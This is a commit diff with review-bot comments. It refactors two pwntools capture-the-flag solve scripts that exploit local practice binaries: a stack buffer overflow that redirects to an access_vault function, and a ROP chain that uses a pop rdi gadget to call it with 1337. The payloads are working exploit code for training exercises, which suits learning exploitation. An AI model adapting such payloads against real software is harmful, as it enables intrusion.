
Commit c74d7be

committed
Add more comments
1 parent 41492ed commit c74d7be

2 files changed

+16
-8
lines changed


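--- a/buffer_overflow/solve.py
+++ b/buffer_overflow/solve.py
@@ -4,8 +4,6 @@
 
 import argparse
 
-ACCESS_VAULT_FUNCTION_ADDR = 0x0000000000401176
-
 if __name__ == '__main__':
 parser = argparse.ArgumentParser()
 parser.add_argument('--debug', action='store_true')
@@ -15,6 +13,8 @@
 # Tell pwntools our target process to automate future functions
 elf = context.binary = ELF('buffer_overflow')
 
+access_vault_function_addr = elf.symbols['access_vault']
+
 if args.debug:
 io = gdb.debug(context.binary.path, '''
 set follow-fork-mode child
@@ -53,7 +53,7 @@
 # We only execute one other function which doesn't need it
 saved_ebp = b'B' * 0x8
 # We have to pack the address properly (endianess!)
-redirect_addr = p64(ACCESS_VAULT_FUNCTION_ADDR)
+redirect_addr = p64(access_vault_function_addr)
 # Craft the final bytes payload
 payload = dummy_data + saved_ebp + redirect_addr
 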
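Review bot: The new symbol lookup on line 16, `access_vault_function_addr = elf.symbols['access_vault']`, fails with a bare KeyError if the binary is ever rebuilt stripped or the function is renamed, which is less informative than the constant it replaces. A short guard keeps the failure readable: `if 'access_vault' not in elf.symbols: raise SystemExit("access_vault symbol not found in buffer_overflow")`. The context comment in the third hunk also reads `endianess`; the word is `endianness`, worth fixing the next time that line is touched. The `if __name__ == '__main__':` block these hunks sit in starts in the first hunk and ends outside the visible hunks.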
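--- a/rop_chaining/solve.py
+++ b/rop_chaining/solve.py
@@ -11,11 +11,14 @@
 
 args = parser.parse_args()
 
-POP_EDI_GADGET_ADDR = 0x0000000000401253
-ACCESS_VAULT_FUNCTION_ADDR = 0x0000000000401176
-
 elf = context.binary = ELF('rop_chaining')
 
+rop = ROP(elf)
+
+# Address can also be found by running 'ropper --file rop_chaining --search "pop rdi; ret"'
+pop_rdi_gadget_addr = rop.find_gadget(['pop rdi', 'ret'])[0]
+access_vault_function_addr = elf.symbols['access_vault']
+
 if args.debug:
 io = gdb.debug(context.binary.path, '''
 set follow-fork-mode child
@@ -27,8 +30,13 @@
 
 io.recvuntil(b"Enter the password to access Santa Ono's secret vault:")
 
-payload = (b'A' * 0x10 + b'B' * 0x8 +
-p64(POP_EDI_GADGET_ADDR) + p64(1337) + p64(ACCESS_VAULT_FUNCTION_ADDR))
+# Padding to get to return address
+padding = b'A' * 0x10 + b'B' * 0x8
+# Pop 1337 into rdi register
+pop_1337_payload = p64(pop_rdi_gadget_addr) + p64(1337)
+# Notice last chain is calling the target access_vault function
+# Most 64-bit calling conventions place the first argument in rdi
+payload = padding + pop_1337_payload + p64(access_vault_function_addr)
 
 io.send(payload)
 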
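Review bot: `rop.find_gadget(['pop rdi', 'ret'])[0]` on new line 19 indexes the result unconditionally, but pwntools' `ROP.find_gadget` returns `None` when no matching gadget exists, so a binary lacking that gadget dies with a TypeError about NoneType instead of a message naming the missing gadget. Split the lookup: `gadget = rop.find_gadget(['pop rdi', 'ret'])`, `if gadget is None: raise SystemExit("no 'pop rdi; ret' gadget found in rop_chaining")`, `pop_rdi_gadget_addr = gadget[0]`; the `elf.symbols['access_vault']` lookup on line 20 deserves the same treatment, as in buffer_overflow/solve.py. The comment on new line 38, `# Most 64-bit calling conventions place the first argument in rdi`, is imprecise (Windows x64 uses rcx) and could read `# System V AMD64 ABI (Linux) passes the first integer argument in rdi`. The top-level script these hunks belong to starts and ends outside the visible hunks.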